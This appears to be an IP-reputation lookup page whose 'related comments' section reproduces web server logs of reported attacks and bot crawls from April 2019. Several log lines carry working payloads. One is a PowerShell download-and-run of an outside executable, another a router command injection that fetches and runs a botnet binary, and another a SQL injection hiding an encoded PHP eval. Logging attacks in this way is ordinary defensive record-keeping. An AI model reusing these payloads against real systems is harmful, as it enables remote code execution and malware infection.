Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 29.63.142.141
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 53291
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;29.63.142.141.			IN	A

;; AUTHORITY SECTION:
.			29	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2024121800 1800 900 604800 86400

;; Query time: 15 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Dec 18 17:06:53 CST 2024
;; MSG SIZE  rcvd: 106
Host info
Host 141.142.63.29.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 141.142.63.29.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
118.25.71.65 attack
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-19 15:56:51
139.59.23.231 attack
ZmEu是个phpMyAdmin脆弱性检查工具,可以发现phpMyAdmin的漏洞,从而进行攻击
139.59.23.231 - - [20/Apr/2019:10:24:06 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 498 "-" "ZmEu"
139.59.23.231 - - [20/Apr/2019:10:24:07 +0800] "GET /phpMyAdmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu"
139.59.23.231 - - [20/Apr/2019:10:24:08 +0800] "GET /phpmyadmin/setup.php HTTP/1.1" 404 477 "-" "ZmEu"
139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /phpmy/scripts/setup.php HTTP/1.1" 404 480 "-" "ZmEu"
139.59.23.231 - - [20/Apr/2019:10:24:10 +0800] "GET /scripts/setup.php/index.php HTTP/1.1" 404 484 "-" "ZmEu"
139.59.23.231 - - [20/Apr/2019:10:24:11 +0800] "GET HTTP/1.1" 400 0 "-" "-"
139.59.23.231 - - [20/Apr/2019:10:24:12 +0800] "GET HTTP/1.1" 400 0 "-" "-"
2019-04-20 10:49:01
49.83.231.243 attack
49.83.231.243 - - [24/Apr/2019:05:55:05 +0800] "POST /user.php HTTP/1.1" 404 467 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\\"id\\";s:3:\\"'/*\\";s:3:\\"num\\";s:201:\\"*/ union select 1,0x2
72F2A,3,4,5,6,7,8,0x7b247b24687a6c6c616761275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262614870736247466e595630704f773d3d2729293b2f2f7d7d,0--\\";s:4:
\\"name\\";s:3:\\"ads\\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
49.83.231.243 - - [24/Apr/2019:05:55:06 +0800] "POST /user.php HTTP/1.1" 404 471 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\\"id\\";s:3:\\"'/*\\";s:3:\\"num\\";s:201:\\"*/ union select 1,0x2
72F2A,3,4,5,6,7,8,0x7b247b24687a6c6c616761275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262614870736247466e595630704f773d3d2729293b2f2f7d7d,0--\\";s:4:
\\"name\\";s:3:\\"ads\\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
2019-04-24 06:15:34
181.209.64.98 bots
181.209.64.98 - - [22/Apr/2019:10:38:45 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8293 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 GTB7.1"
181.209.64.98 - - [22/Apr/2019:10:39:08 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8435 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 ( .NET CLR 3.5.30729)"
181.209.64.98 - - [22/Apr/2019:10:39:28 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8168 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3) Gecko/20121221 Firefox/3.6.8"
181.209.64.98 - - [22/Apr/2019:10:39:50 +0800] "GET /check-ip/94.36.13.15 HTTP/1.1" 200 8149 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6"
2019-04-22 10:41:06
123.206.22.203 attack
123.206.22.203 - - [19/Apr/2019:14:27:22 +0800] "POST /Moxin.PHP HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
123.206.22.203 - - [19/Apr/2019:14:27:26 +0800] "POST /CCCC.PHP HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
123.206.22.203 - - [19/Apr/2019:14:27:26 +0800] "POST /mobai.PHP HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
2019-04-19 14:28:25
52.165.19.185 botsattack
52.165.19.185 - - [25/Apr/2019:15:51:17 +0800] "GET /check-ip/121.7.73.86%2B%22@singnet.com.sg%22 HTTP/1.1" 200 8186 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
52.165.19.185 - - [25/Apr/2019:15:51:17 +0800] "GET /check-ip/121.7.73.86 HTTP/1.1" 200 57126 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
2019-04-25 15:51:59
185.226.146.149 botsattack
185.226.146.149 - - [23/Apr/2019:11:46:18 +0800] "GET /check-ip/162.243.134.187 HTTP/1.0" 200 56262 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0"
185.226.146.149 - - [23/Apr/2019:11:46:20 +0800] "GET /?q=node/add HTTP/1.1" 200 3262 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0"
185.226.146.149 - - [23/Apr/2019:11:46:21 +0800] "GET /?q=user/register HTTP/1.1" 200 3262 "https://ipinfo.asytech.cn/?q=node/add" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0"
185.226.146.149 - - [23/Apr/2019:11:46:21 +0800] "GET /check-ip/162.243.134.187 HTTP/1.1" 200 8238 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0"
185.226.146.149 - - [23/Apr/2019:11:46:22 +0800] "GET /?q=user/register HTTP/1.1" 200 3270 "https://ipinfo.asytech.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0"
2019-04-23 11:47:06
37.59.1.165 bots
37.59.1.165 - - [24/Apr/2019:08:38:38 +0800] "GET //CHANGELOG.txt HTTP/1.1" 301 194 "-" "libwww-perl/6.04"
37.59.1.165 - - [24/Apr/2019:08:38:40 +0800] "GET //CHANGELOG.txt HTTP/1.1" 308 257 "-" "libwww-perl/6.04"
37.59.1.165 - - [24/Apr/2019:08:38:41 +0800] "GET /check-ip//CHANGELOG.txt HTTP/1.1" 301 194 "-" "libwww-perl/6.04"
37.59.1.165 - - [24/Apr/2019:08:38:42 +0800] "GET /check-ip//CHANGELOG.txt HTTP/1.1" 404 232 "-" "libwww-perl/6.04"
2019-04-24 08:57:21
185.244.25.124 attack
185.244.25.124 - - [26/Apr/2019:05:01:46 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://185.244.25.124/bins/maouji.mips%20-O%20/var/tmp/maouji.mips;%20chmod%20777%20/var/tmp/maouji.mips;%20/var/tmp/maouji.mips netgear;%20rm%20-rf%20/var/tmp/maouji.mips&curpath=/¤tsetting.htm=1" 400 0 "-" "-"
2019-04-26 05:02:44
129.204.239.125 attack
129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 301 194 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 404 232 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 301 194 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 404 232 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
2019-04-27 06:48:37
61.139.73.169 attack
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //main.do HTTP/1.1" 404 445 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //console/ HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //console/ HTTP/1.1" 404 446 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //was5/admin/ HTTP/1.1" 404 449 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //was5/admin/ HTTP/1.1" 404 449 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //kingdee/login/loginpage.jsp HTTP/1.1" 404 465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
61.139.73.169 - - [24/Apr/2019:15:56:55 +0800] "GET //kingdee/login/loginpage.jsp HTTP/1.1" 404 465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
2019-04-24 16:00:25
59.36.119.226 attack
59.36.119.226 - - [20/Apr/2019:10:56:43 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
59.36.119.226 - - [20/Apr/2019:10:56:44 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 209 "http://118.25.52.138/w00tw00t.at.blackhats.romanian.anti-sec:)" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117"
2019-04-20 10:57:28
176.9.41.28 bots
seo相关爬虫,禁之
176.9.41.28 - - [24/Apr/2019:08:04:30 +0800] "GET /index.php/category/big-shots/duterte/page/4/ HTTP/1.1" 200 14012 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
176.9.41.28 - - [24/Apr/2019:08:04:31 +0800] "GET /index.php/category/root/block-chain/page/7/ HTTP/1.1" 200 17919 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
176.9.41.28 - - [24/Apr/2019:08:04:32 +0800] "GET /index.php/category/big-shots/duterte/page/32/ HTTP/1.1" 200 13589 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
176.9.41.28 - - [24/Apr/2019:08:04:34 +0800] "GET /index.php/2018/07/25/google_2018_07_25_en/ HTTP/1.1" 200 12535 "-" "Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)"
2019-04-24 08:05:14
200.53.15.17 attack
200.53.15.17 - - [21/Apr/2019:04:56:51 +0800] "GET /wp-login.php HTTP/1.1" 302 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
200.53.15.17 - - [21/Apr/2019:04:56:52 +0800] "GET /wp-login.php HTTP/1.1" 200 7801 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
200.53.15.17 - - [21/Apr/2019:04:56:52 +0800] "GET / HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
200.53.15.17 - - [21/Apr/2019:04:56:53 +0800] "GET / HTTP/1.1" 200 93842 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
2019-04-21 06:59:00
66.240.205.34 attack
66.240.205.34 - - [24/Apr/2019:09:56:25 +0800] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 182 "-" "-"
2019-04-24 09:58:11

Recently Reported IPs

248.204.165.50 157.246.178.220 131.125.60.30 227.196.204.50
194.132.144.113 40.51.253.177 247.154.154.46 202.64.164.205
107.50.205.49 154.5.100.43 225.69.127.4 180.187.94.83
167.123.133.214 128.23.222.136 220.92.143.9 17.159.117.89
40.232.165.176 94.0.47.21 8.224.52.162 44.161.18.99